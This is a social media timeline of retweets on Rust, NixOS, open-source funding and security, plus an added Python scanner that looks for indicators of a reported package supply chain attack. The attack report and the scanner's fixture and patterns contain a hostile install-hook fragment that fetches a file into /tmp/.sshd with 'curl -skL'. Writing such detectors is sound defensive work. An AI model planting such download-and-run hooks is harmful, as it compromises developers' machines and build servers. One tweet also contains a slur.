datapture (@datapture)

500 posts

Joined February 2023
202 Following · 15 Followers
datapture retweeted
ayush🔮👨‍💻🔮 @ayushagarwal027
Rust promises zero-cost abstractions. But how well does it actually deliver? 🦀 Two researchers dug deep, studying the compiler, modifying it, and collecting real performance data for a talk at C++Russia 2026. 150+ slides covering Rust's performance trade-offs in a systematic, data-driven way. Possibly the most comprehensive treatment of the topic to date. Slides + repo: 🔗 github.com/yugr/rust-slid… #Rust #RustLang #SystemsProgramming #Performance #Compilers #CPlusPlus
datapture retweeted
ayush🔮👨‍💻🔮 @ayushagarwal027
Go-to-Rust migration guide you've been waiting for. 🦀 Matthias Endler from corrode.dev just published one of the most honest, practical guides on migrating backend services from Go to Rust. No hype. Just real trade-offs: ✓ nil panics → Option ✓ -race flags → compile-time Send/Sync ✓ if err != nil → Result + ? ✗ Goroutines → async coloring (the real pain point) ✗ Go compile times → Rust compile times (honest warning) Also covers ecosystem mapping, integration strategies, and when to keep Go. 🔗 corrode.dev/learn/migratio… #Rust #RustLang #Go #Golang #BackendDevelopment
datapture retweeted
ayush🔮👨‍💻🔮 @ayushagarwal027
Rust + scoped errors = finally feels right. 🦀 scoped-error is a new crate that attaches context once per function, not at every call site. Clean error trees with file locations, tiny core, std-compatible. A fresh take if anyhow/thiserror/snafu haven't fully clicked for you. 🔗 kanru.info/scoped-error/ #Rust #RustLang #ErrorHandling #OpenSource
datapture retweeted
HSVSphere @HSVSphere
This guy is retarded (what the FUCK is "resistant to supply chains"? you mean "attacks on supply chains"?) and he is wrong. I am totally serious when I say this, I'd trust RedHat Linux more than NixOS for a server that has to run Linux. NixOS doesn't even have exhaustive working LSM support yet. Their model doesn't _even_ solve software that needs to be patched immediately (within minutes, or even seconds), and they are quite slow at building their patches and releasing them to cache as they do not have enough compute. The whole "build static system, roll it out atomically" model can't handle tiny incremental system patches well. (I still like it though, the bad part is that it is one single static layer) The reason I use NixOS is because it is extremely moldable, great for tinkering and amazing if you want to build something completely custom. Anduril uses it for their drones' systems not because it claims to be more secure (it's a linux system without any security modules ffs, and kamikaze drones are famously being known for being internet-connected) but because it is an excellent builder for a Nix-free (but not /nix/store free) Linux system install. Not because it's more secure than RedHat Enterprise Linux or whatever else. It isn't. Outside of the critical services, it barely even enables sandboxing for systemd units in official modules (hope modular services fixes this though) I know for a fact that I'm not an important target, so I do not care that particularly much about acquiring patches for whatever software an hour or day late. If you do, you usually won't use NixOS. (Or if you do, you'd build basically your own distro on top of the NixOS module system or a slimmed down fork of nixpkgs and have your own build farm, requiring you to build vastly less software) Also if you really want an ultra mega secure system you'd not be using Linux in the first place. It is a project that has historically chosen tiny gains in performance over any security gains. 
I'd not go as far as calling it "security hostile" myself, but a lot of the people working on it can be described as so. And no, I am not advocating for any of the BSDs.
Valentin Ignatev @valigo

I admit that NixOS is likely the most secure and resistant (to supply chains) Linux right now. Through the sheer, uhm, let's call it dedication, and also because it's used in the military-industrial complex. But I'm not dealing with a fake Haskell for bash templating!

datapture retweeted
International Cyber Digest @IntCyberDigest
‼️🚨 BREAKING: Another supply chain attack. 700+ GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages. 8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies. The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected. IOCs: GitHub account parikhpreyash4 repo systemd-network-helper-aa5c751f drop path /tmp/.sshd command fragments curl -skL and chmod +x /tmp/.sshd.
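As an added example (not part of the post above and not code from Packagist or any project it names), a small Python scanner that checks a checkout for the indicators the post lists, reading every `package.json` script entry and every GitHub Actions workflow file. The function names, the placeholder URL and the sample tree built in `demo()` are constructed for illustration.

```python
import json
import re
import tempfile
from pathlib import Path
# Indicators quoted in the post; nothing else about the payload is assumed.
IOCS = {
    "account": re.compile(r"parikhpreyash4"),
    "repo": re.compile(r"systemd-network-helper-aa5c751f"),
    "drop-path": re.compile(r"/tmp/\.sshd\b"),
    "curl-flags": re.compile(r"\bcurl\s+-skL\b"),
    "ci-step": re.compile(r"Dependency Cache Sync", re.I),
}

def match_iocs(text):
    """Return the sorted names of the indicators found in text."""
    return sorted(name for name, rx in IOCS.items() if rx.search(text))

def units(path):
    """Split a file into (location, text) pieces: npm scripts or a whole workflow."""
    try:
        raw = path.read_text(encoding="utf-8", errors="replace")
        if path.name != "package.json":
            return [("workflow", raw)]
        scripts = json.loads(raw).get("scripts")
    except (OSError, ValueError, AttributeError):
        return []  # unreadable, malformed JSON, or not a JSON object
    scripts = scripts if isinstance(scripts, dict) else {}
    return [(f"scripts.{k}", str(v)) for k, v in scripts.items()]

def scan_tree(root):
    """Scan package.json files (also under vendor/, node_modules/) and workflows."""
    root, findings = Path(root), []
    for path in [*root.rglob("package.json"), *root.rglob(".github/workflows/*.y*ml")]:
        for where, text in units(path):
            if hits := match_iocs(text):
                findings.append((path.relative_to(root).as_posix(), where, hits))
    return sorted(findings)

def demo():
    """Scan a constructed sample tree (placeholder URL, no real payload)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".github" / "workflows").mkdir(parents=True)
        (root / "package.json").write_text(json.dumps({"scripts": {
            "build": "vite build",
            "postinstall": "curl -skL PLACEHOLDER_URL -o /tmp/.sshd"}}))
        (root / ".github" / "workflows" / "ci.yml").write_text(
            "steps:\n  - name: Dependency Cache Sync\n    run: echo constructed\n")
        return scan_tree(root)
```

Point `scan_tree()` at a project root after dependencies are fetched but before install scripts run, since the post says the script executes on install.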
datapture retweeted
JohnnyTime 🤓🔥 @RealJohnnyTime
Oracle attacks are a reminder that clean code can still encode bad assumptions. You can pass reviews, tests, and style checks - and still fail adversarial reality. The move is learning the attack *class*, not just memorizing one incident. Patch Euler but miss the class behind it, and the same assumption takes down a different protocol. smartcontractshacking.com/attacks/oracle…
datapture retweeted
Anthony Shew @anthonysheww
Inspired by this article, I spent some time this week in Turborepo: 1. Removing all .expect() and .unwrap() usage from implementation code 2. Fixing file system logical bugs corrode.dev/blog/bugs-rust…
datapture retweeted
Dan Lorenc @lorenc_dan
Funding OSS is a hot topic today! I got to spend a lot of time over the last two years working on paying OSS maintainers at @Google. We spent a few million dollars and funded some relatively high profile work, in addition to a lot of smaller projects. A 🧵on problems I saw!
datapture retweeted
Manavmeet Singh @Manavvv31
The uncomfortable truth is that trillion dollar industries are often built on critical infrastructure maintained by exhausted volunteers with zero contractual obligation to anyone. Companies love calling OSS a “community” right up until they expect enterprise level guarantees for free @mitchellh
datapture retweeted
Anant Shrivastava @anantshri
@mitchellh On top of this, we have also left these developers unprotected making them the weakest entity without being paid without asking for being part of the chain we have made them the target. I noted similar thoughts a few days back blog.anantshri.info/open-source-un…
datapture retweeted
Mitchell Hashimoto @mitchellh
Supply chain attacks and OSS sustainability go hand in hand. I've semi-seriously joked for years that OSS upstreams should periodically purposely inject full vulns into their code and let downstreams fuck around and find out. Downstreams can pay to get the non-FAFO version. The not joke part is simply that OSS maintainers aren't a supply chain. OSS maintainers are not responsible for monitoring CVEs (because, they are not a supply chain). OSS maintainers are not at fault when bad shit happens to downstreams, because basically every OSS license (MIT, Apache, GPL, etc.) literally says: the software is provided "as-is, without warranty." You get what you pay for (that is to say: absolutely nothing!) Now, the joke part is that I do believe there is an ethical obligation to try to prevent harm downstream. But "try" is the key word. So, this isn't a serious proposal. But, if you're using OSS code and you're not paying for a license with a contract that promises some kind of warranty, you have no supply chain. You (the downstream user of an OSS lib) ARE the supply chain. To use a metaphor: physical goods have a real supply chain. Car manufacturers, chips, clothes, toys, etc. You have a signed commercial agreement with all your suppliers that promises quantity AND quality and blowback if either are missed. That's a supply chain. If someone puts some chips on the side of the road with a "FREE" sign, then you integrate those into a product, then find out those chips are hacking customers, it's your fault, not the person who dropped them on the side of the road.
datapture retweeted
Aynekko @aynekko
This is called interior mapping, and I also did that in my #Xash3D engine game. I have tested it as low as Nvidia 8600 GT from 2007 and, surprisingly, this particular setup isn't GPU-heavy at all.
DX @DX_Nacca

People underestimate the power of shaders! 😎 Most environments look artificial cause the surfaces feel flat and lifeless So, inspired by Forza Horizon, I created this shader to add depth and atmosphere! Completely changing how flat surfaces are perceived Coming soon on Patreon #VRChat #Shader

datapture retweeted
Mathematica @mathemetica
L'Hôpital's Rule For differentiable functions f and g near a (with g'(a) ≠ 0), lim x→a f(x)/g(x) = lim x→a f'(x)/g'(x) The diagrams illustrate the geometric meaning: as x approaches a, the ratio of the function values equals the ratio of the tangent slopes df(a)/dg(a) at that point. This rule is applied to resolve indeterminate limit forms 0/0 and ∞/∞ by differentiating the numerator and denominator (and repeating as needed).
datapture retweeted
Wyatt Benno @wyatt_benno
Formal verification of software is having a moment. Thanks Vitalik🫡! But most unfortunately, assume Lean is the only path. It's one of many approaches & each comes with very different trade-offs. Let's look at the trade-offs in four axes: 1) Spec depth: how much of a program can be formally verified using the tool. 2) Security: all possible outputs proven safe. 3) LLM ease: how easily an LLM produces code that meets spec. 4) Succinct verification (probably nothing 🤷): verifying the whole chain — natural language → spec → formally verified code — end-to-end in <1s. *A superpower only cryptography (ZK proofs) can deliver. Before: machine speed coding, human speed verification. Lots of bugs, lots of hacks.. lots of pain. After: machine speed coding, machine speed verification. Provably correct, end-to-end, in under a second. We have Vericoding working at ICME Labs. DM to try it or collab!
datapture retweeted
Andrew Lamb @andrewlamb1111
I just had the chance to watch Samyak Sarnayak's talk about cancellation safety and async Rust (and how a `&mut` can lead to a deadlock). If this is a topic that interests you, I recommend checking it out: samyak.me/talks/cancel/
datapture retweeted
Guinxu @guinxu
I'm programming the Guinxu Engine from scratch, truly bare-bones, without OpenGL. I started by drawing 1 pixel. Then I built on that to draw lines. And now I can draw barycentric triangles with a color at each vertex. I'd like to end up displaying 3D models if it doesn't get too complicated.